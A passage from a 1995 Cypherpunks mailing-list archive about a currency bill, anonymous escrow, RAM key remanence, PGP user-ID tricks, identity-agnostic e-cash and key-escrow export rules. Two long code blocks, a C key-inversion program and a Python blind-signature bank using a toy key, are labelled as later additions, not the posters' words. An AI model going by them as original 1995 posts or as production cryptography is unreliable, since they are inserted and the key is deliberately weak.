>     (1)  domestic use currency, issued in accordance with this section shall
>be recognized as constituting a negotiable claim against the United States
>Treasury only when presented within the United States, and shall constitute
>legal tender for any debts, public or private, only when presented in the
>United States, but such currency may be exchanged for equal values of $100
>denomination nondomestic use currency (or other United States currency) only
>at financial institutions regulated by United States law and subject to
>United States currency transaction reporting and other money laundering
>deterrence requirements; and
>     (2)  nondomestic use currency shall be recognized as constituting a
>negotiable claim against the United States Treasury, and legal tender for
>any debts, public or private, only when presented outside of the United
>States, but such currency may be exchanged for equal values of $100
>denomination domestic use currency (or other United States currency) at
>financial institutions regulated by United States law and subject to
>United States currency transaction reporting and other money laundering
>deterrence requirements.
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: terrell@sam.neosoft.com (Buford Terrell)
Date: Mon, 4 Sep 95 11:02:38 PDT
To: cypherpunks@toad.com
Subject: Re: A problem with anonymity
Message-ID: <199509041812.NAA06959@sam.neosoft.com>
MIME-Version: 1.0
Content-Type: text/plain


>To: TCMAY@GOT.NET, CYPHERPUNKS@toad.com
>Subject: Re: A problem with anonymity
>From: monty.harder@famend.com (MONTY HARDER)

>
>
>  But if the escrow agent is anonymous, we simply recurse, moving now to
>the question of whether anyone can trust the Anonymous Escrow Agency not
>to take the money and run.
>
>TC> (I mention banks because, when you look at it closely, today's banks can
>TC> quite easily claim that a customer made a withdrawal when he didn't. That
>TC> they don't says more about the nature of persistent businesses than about
>TC> any government oversight or security features. This is a side point, but it
>TC> bears keeping in mind that the real world of banks and businesses, etc., is
>TC> not fully secure, either. And yet it mostly works pretty well. The reasons
>TC> for this are interesting to consider.)
>
>  A bank has $$ invested in impressive-looking buildings, (so that
>vanishing into the ether and setting up shop elsewhere is rather
>difficult) and several officers whose TrueNames are registered with the
>appropriate agencies, so that they may be sued if they pull this
>crap.
>
>  While individual stockholders might appreciate the anonymity (and
>protection from legal action) of owning stock in a bank or escrow agency
>(might just combine the functions, while we're at it), they demand
>onymity of the officers with whom they entrust the keys to the
>corporation.
>Monster@FAmend.Com *    
>
>
The real secret is that for most banks the individual transaction
is << than the total stream of transactions.  Defaulting on a single
transaction will show a profit that is miniscule compared to the
over-all earnings at stake if the bank's credibility is jeopardized.
When banks have gotten into trouble it is frequently when they allow
one customer or one transaction to represent a significant share
of their business.  You have a high probability of being able to
trust an escrowee with your $1 if you know he intends to collect
commissions on holding $1million for others based on his "trusted"
representation.

Buford C. Terrell                       1303 San Jacinto Street
Professor of Law                              Houston, TX 77002
South Texas College of Law                voice   (713)646-1857
terrell@sam.neosoft.com                     fax   (713)646-1766





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Mon, 4 Sep 95 14:59:35 PDT
To: cypherpunks@toad.com
Subject: Seattle area Cypherpunks
Message-ID: <199509042159.OAA15140@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


With the Labor Day weekend/vacation season almost over and a variety of projects completed, I'm going to attempt to jump-start Cypherpunk activities in the Seattle area (the Seattle Cypherpunks sub-list appears to have withered away, so delete this if you're outside the Pacific Northwest). 

The first order of business is to get an idea of how many people would be interested in meeting some evening, likely toward the end of September.  Send me e-mail (please don't reply to the list) with a time and geographic preference as to location.  I'm on the Eastside, so will be slightly biased in finding an appropriate meeting place in the Bellevue/Redmond area, unless persuaded otherwise.

Also, let me know if you're interested in discussing (or presenting) any specific crypto/privacy/ecash-related topics in a very informal setting.  Aside from key signing and general face-to-face networking, I would like to have a few set items on the agenda.  Any suggestions welcomed.

Based on your responses, I'll do all of the running around and organizational type activities, and follow-up with e-mail and a general announcement to the main list when arrangements are finalized.

This is an opportunity to get away from your keyboards and meet other folks who share your interests.  Hope to see you later this month.

Joel McNamara
joelm@eskimo.com - http://www.eskimo.com/~joelm for PGP key
Thomas Jefferson used strong crypto, shouldn't you?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Mon, 4 Sep 95 12:04:13 PDT
To: cypherpunks@toad.com
Subject: my crypto rump session abstract
Message-ID: <9509041912.AA06063@merckx.info.att.com>
MIME-Version: 1.0
Content-Type: text/plain


(the one that david sternlight misinterpreted to mean that we
had proven that clipper has no back doors):

M. Blaze, J. Feigenbaum, F.T. Leighton, "Master Key Cryptosystems",
Crypto '95 "rump session" abstract, August 1995.  Available as:
ftp://research.att.com/dist/mab/mkcs.ps

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 4 Sep 95 15:17:31 PDT
To: Black Unicorn <unicorn@access.digex.net>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <Pine.SUN.3.91.950904173143.17862B-100000@access2.digex.net>
Message-ID: <199509042217.PAA17498@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Anon writes>
> When a running computer is seized in some sort of law enforcement
> raid, what are the chances someone would think to backup the
> contents of a RAMDISK drive prior to powering it down?

Also note the recent posting on sci.crypt by Peter Gutmann about being
able to recover data from DRAMs and SRAMs after powerdown. It hits
cryptokeys really bad. 

I suppose this is really academic at the current stage, but that might
change.

/Christian




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: thad@hammerhead.com (Thaddeus J. Beier)
Date: Mon, 4 Sep 95 15:43:30 PDT
To: cypherpunks@toad.com
Subject: Encrypted desktop videoconferencing
Message-ID: <199509042240.PAA01994@hammerhead.com>
MIME-Version: 1.0
Content-Type: text/plain



A friend of mine works for a large input-device company, and they are looking
to get into the desktop videoconferencing business.  Their current business 
is extremely competitive on price, and they'd like to do something in
desktop videoconferencing that would distinguish them from everybody else.
Naturally, I suggested cryptography.

I have always thought that the biggest problem introducing crypto to
phone conversations was the large amount of cpu speed and software complexity
to digitize the audio; that adding the crypto code is relatively minor.
Certainly RC4 and IDEA for instance, run very fast.  In videoconferencing
applications, this audio compression is already being done, so adding
the crypto should be almost free.

Well, except for licensing costs.  I'd really like to use Diffie-Hellman
to negotiate a key.  Does anyone know how much it would cost to license
that from PKP?  I'd expect that there would be a one time fee, plus
a per-copy-sold fee.

Does anybody know - and if so, can they say - if anybody else has added
or is adding cryptography to their videoconferencing systems?  It seems
like such a killer ap that I must be overlooking something.

thad
-- Thaddeus Beier                   email:  thad@hammerhead.com
   Technology Development             vox:  408) 286-3376
   Hammerhead Productions             fax:  408) 292-8624




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ghio@c2.org (Matthew Ghio)
Date: Mon, 4 Sep 95 13:06:17 PDT
To: cypherpunks@toad.com
Subject: alpha.c2.org nymserver source code
Message-ID: <m0sphST-0012qYC@myriad>
MIME-Version: 1.0
Content-Type: text/plain


I have packaged up the source for the nymserver I run on alpha.c2.org,
and written a brief description of how to install it.  E-mail me if you
want it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 4 Sep 95 16:14:32 PDT
To: cypherpunks@toad.com
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <Pine.SUN.3.91.950904184522.20203A-100000@access5.digex.net>
Message-ID: <199509042314.QAA18360@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



Someone proposed that one could wipe the memory before power-down, for
example during 1 second or something like that. Unfortunately, that
won't help, unless I misread the paper. It is effectively the same as
if the key had been stored in the cell for 1 second less, nothing else.

The only way I can see how to avoid generating "imprints" of more or
less static data is to make them non-static. Start circulating them
around.

One way that springs to mind for keys is to do something like
inverting the meaning of the key every x milliseconds. Like this; 

     /* pseudo code */
     char master_key[KEYSIZE];
     int  meaning = ZEROS;

     void encryption(char *input, char *output); /* implicit master_key */
     int using_key = FALSE;

     main() {
       input_from_keyboard(master_key);
       timer(100 ms, flipem()); /* calls flipem every 100 ms */

       main_loop(); /* occasionally using encryption() */
     }

     void flipem() {

       if (using_key) /* risk of never being able to flipem() */
         return;
   
       /* some kind of semaphored section */
       using_key = TRUE;
       master_key = inverse(master_key);
       meaning = (!meaning);
       using_key = FALSE;

     }

     void encryption(char *input, char *output) {

      char real_key[KEYSIZE]; /* must be on stack */

      copy_key(real_key, master_key);
      if (meaning == ONES)
        invert(real_key);           /* recovering real content */
      encrypt(input, output, real_key);

      write_random_key(real_key); /* so "real" key doesn't become 
                                     imprinted as well. */
     }

I don't care about the plaintext in the above. Nor stack content very
much. Nor about coding style.
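
A runnable C version of the key-flipping idea in the message above, added here as an example and not the poster's own code. The names (`flipping_key`, `fk_flip`, `fk_encrypt`, `max_bit_skew`), the 16-byte key and the repeating-key XOR standing in for a real cipher are assumptions; the `busy` flag assumes a single-threaded program whose flip runs from a timer callback.

```c
#include <signal.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define KEYSIZE 16

/* Constructed sample key, for demonstration only. */
static const uint8_t DEMO_KEY[KEYSIZE] = {
    0x00, 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77,
    0x88, 0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff
};

typedef struct {
    volatile uint8_t bytes[KEYSIZE];  /* the key or its bitwise complement */
    volatile sig_atomic_t inverted;   /* 1 when bytes hold ~key */
    volatile sig_atomic_t busy;       /* 1 while a reader copies the key out */
    unsigned long skipped;            /* flips refused because busy was set */
} flipping_key;

/* Overwrite through a volatile pointer so the stores are not optimised away. */
static void secure_wipe(void *p, size_t n)
{
    volatile unsigned char *v = (volatile unsigned char *)p;
    while (n--) *v++ = 0;
}

void fk_load(flipping_key *k, const uint8_t key[KEYSIZE])
{
    for (size_t i = 0; i < KEYSIZE; i++) k->bytes[i] = key[i];
    k->inverted = 0;
    k->busy = 0;
    k->skipped = 0;
}

/* Timer callback: complement the stored key. Returns 1 if flipped, 0 if skipped. */
int fk_flip(flipping_key *k)
{
    if (k->busy) { k->skipped++; return 0; }
    for (size_t i = 0; i < KEYSIZE; i++) k->bytes[i] = (uint8_t)~k->bytes[i];
    k->inverted = !k->inverted;
    return 1;
}

/* Stand-in for a real cipher (assumption): repeating-key XOR, not secure. */
static void toy_cipher(const uint8_t *in, uint8_t *out, size_t n,
                       const uint8_t key[KEYSIZE])
{
    for (size_t i = 0; i < n; i++) out[i] = in[i] ^ key[i % KEYSIZE];
}

/* Recover the real key into a short-lived stack copy, use it, wipe it.
 * busy is held only during the copy, so flips are rarely starved. */
void fk_encrypt(flipping_key *k, const uint8_t *in, uint8_t *out, size_t n)
{
    uint8_t real_key[KEYSIZE];
    k->busy = 1;
    uint8_t mask = k->inverted ? 0xFF : 0x00;
    for (size_t i = 0; i < KEYSIZE; i++) real_key[i] = k->bytes[i] ^ mask;
    k->busy = 0;
    toy_cipher(in, out, n, real_key);
    secure_wipe(real_key, sizeof real_key);
}

/* Sample the stored bits once per tick and return the largest
 * |ticks-as-1 minus ticks-as-0| over all bit cells: 0 means no bias. */
unsigned long max_bit_skew(const uint8_t key[KEYSIZE], unsigned ticks, int flip)
{
    flipping_key k;
    long ones[KEYSIZE * 8] = {0};
    unsigned long worst = 0;
    fk_load(&k, key);
    for (unsigned t = 0; t < ticks; t++) {
        for (size_t i = 0; i < KEYSIZE * 8; i++)
            ones[i] += ((k.bytes[i / 8] >> (i % 8)) & 1) ? 1 : -1;
        if (flip) fk_flip(&k);
    }
    for (size_t i = 0; i < KEYSIZE * 8; i++)
        if ((unsigned long)labs(ones[i]) > worst) worst = (unsigned long)labs(ones[i]);
    secure_wipe(&k, sizeof k);
    return worst;
}

/* Returns 1 if encryption is unaffected by a flip, storage really holds
 * the complement after one flip, and a flip is refused while busy. */
int fk_self_check(void)
{
    static const uint8_t msg[] = "constructed test message";
    uint8_t c1[sizeof msg], c2[sizeof msg];
    flipping_key k;
    int ok = 1;
    fk_load(&k, DEMO_KEY);
    fk_encrypt(&k, msg, c1, sizeof msg);
    ok &= fk_flip(&k);
    for (size_t i = 0; i < KEYSIZE; i++)
        ok &= (k.bytes[i] == (uint8_t)~DEMO_KEY[i]);
    fk_encrypt(&k, msg, c2, sizeof msg);
    ok &= (memcmp(c1, c2, sizeof msg) == 0);
    k.busy = 1;                        /* simulate a reader mid-copy */
    ok &= (fk_flip(&k) == 0 && k.skipped == 1);
    secure_wipe(&k, sizeof k);
    return ok;
}

int main(void)
{
    printf("self check: %d\n", fk_self_check());
    printf("skew, static key:  %lu\n", max_bit_skew(DEMO_KEY, 1000, 0));
    printf("skew, flipped key: %lu\n", max_bit_skew(DEMO_KEY, 1000, 1));
    return 0;
}
```

The skew figure is the point of the scheme: with flipping, every memory cell spends equal time as 0 and as 1 whatever the key is, while the stack copy in `fk_encrypt` still holds the true key briefly on each call.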





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Mon, 4 Sep 95 13:31:43 PDT
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: The Dangers of Caribbean Data Havens
In-Reply-To: <ac70802208021004b5e3@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950904162332.20551D-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Timothy C. May wrote:

> >From Bruce Sterling in "Islands in the Net" to various reports of data
> havens and Internet services being set up by actual people, there has been
> much speculation about using Caribbean islands for data havens.
> 
> But the infrastructure has been lacking. Low-bandwidth inter-island links.
[...]
> Personally, I think a distributed system based on crypto is a more robust
> approach, the "Libertaria in Cyberspace" view I've talked about.

For legal purposes, perhaps, set up shop on the Islands.

Then have a site somewhere else -- backup of your corporate system, 
nothing more.  And, of course, a net connection -- all for redundancy's sake.

If your Euro/American site is merely a mirror of a legal site in another 
country, and you're the same organization, would it be legal?

Hmmmm... this all still needs work...
Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lwp@mail.msen.com (Lou Poppler)
Date: Mon, 4 Sep 95 14:08:41 PDT
To: Hal <cypherpunks@toad.com
Subject: Re: pseudonyms & list health
In-Reply-To: <199509040451.VAA23173@jobe.shell.portal.com>
Message-ID: <NI2SwMz2BgTU083yn@mail.msen.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 3 Sep 1995 21:51:21 -0700, Hal <hfinney@shell.portal.com> wrote:

} An interesting point.  I have long wished that there would be a form of
} "credential certificates" which people could give as special signatures
} on other people's public keys.  Then using Chaumian credential technology
} it would be possible to anonymously transfer these credentials from one
} pseudonym to another.
/.../ 
} I certainly appreciate these kinds of comments, but it would be even
} more useful if such messages were expressed as the kinds of
} certificates I am describing.  I wonder whether people would be willing
} to use a program which would let them issue such "reputation
} signatures" of various kinds, and display the signatures which were
} present on keys.
/.../ 
} I could see such a system initially being piggybacked on PGP keys (the
} signatures would not be understandable by PGP though), although for
} Chaumian credential transfers the keys have to be specially structured
} and that would require a new approach.

When the list was discussing "key as final authority" a while back,
Wei Dai posted (on May 31) a program called 'addid' which allows one
to add arbitrary strings as user IDs on other people's pgp keys.
These appear just as though PGP had added them itself, and are signable
and displayable by regular old PGP.

As an exercise, I grabbed Hal's "insecure key" from the keyserver,
and used 'addid' to add a new ID to it, which I then signed.

Here's the output of 'pgp -kc 0xcbd301':
Key ring: 'pubring.pgp', looking for user ID "0xcbd301".
Type bits/keyID    Date       User ID
pub   512/4ECBD301 1994/11/29 Hal writes good posts -- Read them all
sig!      2C48CAE9 1995/09/04  Lou Poppler <lwp@mail.msen.com>
                              Hal Finney insecure key
sig!      58214C37 1994/12/01  Hal Finney <74076.1041@compuserve.com>

(If anyone cares) here is Hal's key cbd301, as summarized above:


here is my key 48cae9, which signs the above new ID (and this mail):


::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::   Lou Poppler  <lwp@mail.msen.com>   |    Doom an evil deed,           ::
::     http://www.msen.com/~lwp/        |     liven a mood.               ::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMEtoa2pfQFwsSMrpAQGDAwQAjrdHWqJSsI5WB9exvJZf21mVZwCjaGuH
XlK/e0+i6p3Zf8YYyY3EFP/gwL4191PhB2AG2gD77tI0ijG7GI8gD0nZQc3ZwH/C
N+zfgH9OOOVxu5CUKcuSBC8AgIu7RYdKb3WFqA+5QczjaWjKiz5XuviJoUg1QLGD
TemyBujRxhE=
=RYHl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christian Wettergren <cwe@Csli.Stanford.EDU>
Date: Mon, 4 Sep 95 16:38:57 PDT
To: Christian Wettergren <cwe@Csli.Stanford.EDU>
Subject: Re: Emergency File Wipe Algorithim
In-Reply-To: <199509042314.QAA18360@Csli.Stanford.EDU>
Message-ID: <199509042338.QAA18782@Csli.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain



FYI.
Repost from sci.crypt. It seems as if it has expired 
at some places.

/Christian






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Mon, 4 Sep 95 16:45:35 PDT
To: cypherpunks@toad.com
Subject: Identity Agnostic Online Cash
Message-ID: <v02120d00ac714b3ee057@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



An early draft of a paper based on my comments at the Crypto '95
rump session is available at:

http://www.communities.com/paper/agnostic.html

Here's the abstract:

Abstract: One of the unique aspects of Chaum's blind signature
scheme for anonymous transactions is that it is practiced entirely
by the side that wants to be anonymous. In a customer-bank
relationship, the customer's software practices the technology, not
the bank's. Chaum's patent on blind signatures cites as prior art a
non-anonymous signature scheme that differs significantly only in
steps taken by the "customer" side. An open standard for
electronic cash would then allow a bank or other cash issuer to
remain agnostic with respect to customer's software blinding or
not blinding. Since the bank's software would be practicing
technology cited as prior art by Chaum in his patent, and would
have a substantial non-infringing use, I argue that the bank would
not need to license Chaum's patents, provided the bank itself only
provided non-blinding customer software.


Here's a review of the talk by Hal Finney... :-)

One of the more interesting talks I thought was from cypherpunk Doug
Barnes, on "identity agnostic" electronic cash.  This is basically an
idea for creating a Magic-Money-type electronic cash server without
violating Chaum's cash patent.  What you do is to run the server and
publish a spec it will follow.  All the server does is do an RSA
signature on the raw data it receives and decrement the user's account
accordingly.  The user has a choice of doing blinding or not on the
signature.

Chaum's patent covers the blinding, so if the user wants to do that he
should be sure to license the patent or live somewhere it doesn't apply
(or ignore it if he figures he's too small potatoes for them to care
about).  But the server isn't responsible for checking all this.  It just
does RSA sigs, which is prior art as far as Chaum's patent goes.  Users
can blind or not, it doesn't care.  It is "identity agnostic" as Doug
says.

The implication is that with an RSA license you could run this kind of
bank (online cash) and ignore Chaum's patents, while a horde of end users
violate the patents but take safety in numbers and get anonymity.
Lawyers like to go after big targets but the servers aren't violating
anything.
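
The server behaviour described in the abstract and in the review above, as an added example that is not code from the paper or from Magic Money: a bank that only applies the raw RSA private-key operation and debits an account, with one client that does not blind and one that does. The key (two Mersenne primes), the hash-of-serial coin format and all names are assumptions made for the illustration.

```python
import hashlib
import math
import secrets

# Constructed demo key (assumption): the Mersenne primes 2**61-1 and 2**89-1.
# Far too small and too structured for real use; it keeps the numbers readable.
P, Q = 2**61 - 1, 2**89 - 1
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))


def coin_digest(serial: bytes) -> int:
    """Map a coin serial number to the integer the bank's signature must cover."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


class Bank:
    """Issuer: debits one unit and applies the raw RSA private-key operation.

    It never looks inside the value it signs, so it cannot tell a blinded
    request from a plain one. The key must be used for nothing but coins,
    because raw RSA will sign whatever integer it is handed.
    """

    def __init__(self, balances):
        self.balances = dict(balances)
        self.spent = set()

    def withdraw(self, account: str, value: int) -> int:
        if not 0 < value < N:
            raise ValueError("value out of range")
        if self.balances.get(account, 0) < 1:
            raise ValueError("insufficient funds")
        self.balances[account] -= 1
        return pow(value, D, N)

    def deposit(self, serial: bytes, signature: int) -> bool:
        if pow(signature, E, N) != coin_digest(serial):
            return False            # not signed by this bank
        if serial in self.spent:
            return False            # online double-spend check
        self.spent.add(serial)
        return True


def withdraw_plain(bank, account):
    """Non-blinding client: the bank sees the digest it will be shown at deposit."""
    serial = secrets.token_bytes(16)
    seen_by_bank = coin_digest(serial)
    return serial, bank.withdraw(account, seen_by_bank), seen_by_bank


def withdraw_blinded(bank, account):
    """Blinding client: same server call, but the value is masked by r**E first."""
    serial = secrets.token_bytes(16)
    while True:
        r = secrets.randbelow(N - 2) + 2
        if math.gcd(r, N) == 1:
            break
    seen_by_bank = (coin_digest(serial) * pow(r, E, N)) % N
    blind_sig = bank.withdraw(account, seen_by_bank)
    # (m * r**E)**D = m**D * r (mod N), so dividing by r leaves the signature on m.
    return serial, (blind_sig * pow(r, -1, N)) % N, seen_by_bank
```

Both clients call the same `withdraw()` and both coins pass the same `deposit()` check; only in the plain case does the value the bank signed match what it is later shown.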







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 4 Sep 95 14:12:34 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <199509042110.RAA22377@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 01:41 PM 9/4/95 -0400, Robert Hettinga wrote:
>Has anyone heard about this bill?  Comments?

This idea seems to get proposed every few years. In the past it
has been shelved as soon as someone figures out the disaster that
would be caused by the resultant decline in the value of the
dollar. The U.S. Government has to be nice to foreigners that hold large
quantities of dollars and treasury securities, even if it doesn't
care about the political consequences at home.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 14:14:41 PDT
To: Sandy Sandfort <sandfort@crl.com>
Subject: Re: e$: More fun with cash: Senate Bill 307
In-Reply-To: <Pine.SUN.3.91.950904111848.5541B-100000@crl2.crl.com>
Message-ID: <Pine.SUN.3.91.950904170619.17185B-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Sandy Sandfort wrote:

> Date: Mon, 4 Sep 1995 11:35:20 -0700 (PDT)
> From: Sandy Sandfort <sandfort@crl.com>
> To: Robert Hettinga <rah@shipwright.com>
> Cc: cypherpunks@toad.com
> Subject: Re: e$: More fun with cash: Senate Bill 307
> 
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>                           SANDY SANDFORT
>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
> 
> C'punks,
> 
> On Mon, 4 Sep 1995, Robert Hettinga wrote:
> 
> > Has anyone heard about this bill?  Comments?
> 
> > >(c)  Currency Exchange--
> > >     (1)  Plan--Not later than 12 months after the date of enactment of this
> > >section, the Secretary shall develop and begin implementation of a plan to
> > >require the exchange of all existing $100 denomination United States currency
> > >held within and outside of the United States for $100 denomination domestic
> > >use and nondomestic use United States currency issued in accordance with this
> > >section.
> 
> . . .
> 
> > >     (1)  domestic use currency, issued in accordance with this section shall
> > >be recognized as constituting a negotiable claim against the United States
> > >Treasury only when presented within the United States, and shall constitute
> > >legal tender for any debts, public or private, only when presented in the
> > >United States, . . .
> 
> > >     (2)  nondomestic use currency shall be recognized as constituting a
> > >negotiable claim against the United States Treasury, and legal tender
> > >for any debts, public or private, only when presented outside of the 
> > >United States, . . .
> 
> It's obvious that this bill has very little to do with large-scale
> money laundering, narcotrafficking nor terrorism.  All those folks 
> will simply use "domestic use currency" inside or outside of the 
> United States.  At worst, it will cause them a one-time problem.
> 
> Then at whom is the bill really aimed?  Average, middle-class
> Americans, is my guess.  Fortunately, it doesn't look too tough
> to get around.  If you have a mattress full of C-notes, I suggest
> you start using them to buy travelers checks--including a few
> denominated in strong foreign currencies.


Actually it was aimed at the rumors that Iran had been printing U.S. 
currency on a large scale and using it abroad.  When I say Iran, I mean 
a government backed program.  New York Times had an article on the matter 
last year.  With enough interest I will try to Lexis/Nexis it.

While there was some evidence that Iran had indeed been forging notes, 
the extent was unclear/minimal.  Of course, with this kind of rumor there 
is the issue of confidence in the currency as well as actual threat.

The first response was the inset of the polyester and foil thread in the 
bills (and NO they can't detect quantity as you go through airport 
sensors, and don't ask me again).  The foreign traveller will notice the 
serious scrutiny all U.S. bills abroad will receive, particular attention 
paid to the presence of the strip.  Many foreign shops will not take U.S. 
bills which are older and have no strip as a result.

This new plan, which is total lunacy of course, and which I expect to fail, 
but the real zap is on anyone with a spare million in counterfeit or undeclared 
currency.

I might add, try being a tourist in Estonia and presenting U.S. bills that 
are no good in the U.S.  You'll be about as popular as someone in the 
Midwest with Canadian bills.

>
>  S a n d y
> 

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Limpert" <johnl@radix.net>
Date: Mon, 4 Sep 95 14:21:11 PDT
To: cypherpunks@toad.com
Subject: Re: The Dangers of Caribbean Data Havens
Message-ID: <199509042119.RAA22672@saltmine.radix.net>
MIME-Version: 1.0
Content-Type: text/plain


At 10:19 AM 9/4/95 -0700, Timothy C. May wrote:
>"Outages" lasting days or weeks after these islands get torn up every few
>years will not go too well with international commerce.

I thought there were a number of bank and credit card data entry
centers that had already moved to the Caribbean. They may not care
if the local phone service gets wiped out for several weeks if
they have a hardened line to the nearest Cable & Wireless earth station.


--
John A. Limpert
johnl@Radix.Net





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 4 Sep 95 17:23:23 PDT
To: pfarrell@netcom.com
Subject: Re: Acceptable NIS&T restrictions
Message-ID: <199509050019.RAA27055@ix9.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:54 PM 9/4/95 -0400, Pat Farrell commented on the NIST's
latest proposals for their September meeting on export controls
and software with built-in government access to keys (GAK).
I'll generally use the terms GAK or master keying rather than escrow,
since escrow is a legal term that implies both the willingness of
both parties to use it, and also that the escrowed material
be delivered only when certain criteria are satisfied, which is 
out of the scope of almost any proposals I've seen labelling themselves
"key escrow", particularly the Clipper system.
Material with > and indentation are from the NIST paper;
material with just > and 0-1 spaces is Pat's.

64 bits of keyspace is of course hopelessly inadequate for financial
transactions - crackerboxes have been designed that allow very rapid breaking
of single-DES or short-key RC4, and a useful platform needs to accommodate
high-value transactions such as customers' access to stockbrokers as well as
more limited-value transactions such as credit cards where a $1000 cracking
cost makes crime not pay well.  The Administration argues that the limitation
makes up for the possibility that users may find ways to evade GAK; but users
can already do that now.

>    "Avoiding multiple encryption -- How can the product be
>     designed so as to prevent doubling (or tripling, etc.) the
>     key space of the algorithm?"
>CME has been suggesting DES | TRAN | DES | TRAN | DES
>for years. Can they really _avoid_ (i.e. prevent) this?
(CME is Carl Ellison at TIS; tran is a simple transposition system.)

Sure - if the software always tacks in master keys any time it
does a symmetric-key encryption, and won't/can't decrypt without it,
then DES+GAK | DES+GAK | DES+GAK is just as vulnerable to someone
with the master key as single DES+GAK - it just takes three separate
phases of key forfeiture to decode.  (yes, I left out the tran phase;
anybody going to that much work is using something other than the
built-in encryption, at which point they might as well use
non-government-approved encryption themselves.)  Does it triple the
key space?  For people without the master key, yes, though maybe they
get some known plaintext.  For people with the master key, it depends
on your definitions, and maybe _they_ put in some known plaintext that
they don't give outsiders, but it probably doesn't lose them much.

>    "Disabling the key escrow mechanism -- How can products be
>     made resistant to alteration that would disable or
>     circumvent the key escrow mechanism?  How can the "static
>     patch" problem be avoided?  How can this be tested?"
>
>This is easy in hardware. Is it even possible in software?

Probably.  Consider the sort of master-key system where part of the
session key isn't transmitted - maybe you do something like
hash the user portion of the session key with the hash of the
program and feed it to the KeyMaster's public key to get
the session key.  By the time you put all of that into
Pretty Good PatchAround, you might as well just use PGP.

>    "Practical Key Access -- How can mechanisms be designed so
>     that repeated involvement of escrow agents is not required
>     for decryption for multiple files/messages during the
>     specified access period?"
>At least this has a chance of being real. We need to have a suggestion
>for expiration times for the escrowed keys. This was a huge problem with the
>initial Clipper.  

Information can't be destroyed, only forgotten, so time-limitation is tough.
What you can do is limit the scope of messages that can be decrypted by
one trip to the keymaster - the Feds are looking for some mechanism so that
any limits like this won't require multiple trips for one bunch of wiretapping.

>Is there a reasonable middle ground between long term keys such
>as PGP uses, and the ephemeral keys of a D-H exchange?

What's reasonable?  Some potential models for a PGPng would be 
- Use separate keys for signatures/keysigning and messages, so you could
change your message key frequently while leaving your signature (or at least
key-signature) key stable.  (This tends to need an extra layer in the web
of trust, since you now have two tiers for yourself, but no biggie.)
- Diffie-Hellman kind of mechanism to encrypt the keys, with published
g, p, g**x mod p, x changing frequently, RSA or DSS or whatever to sign
the keyparts - this works better with a more interactive key negotiation
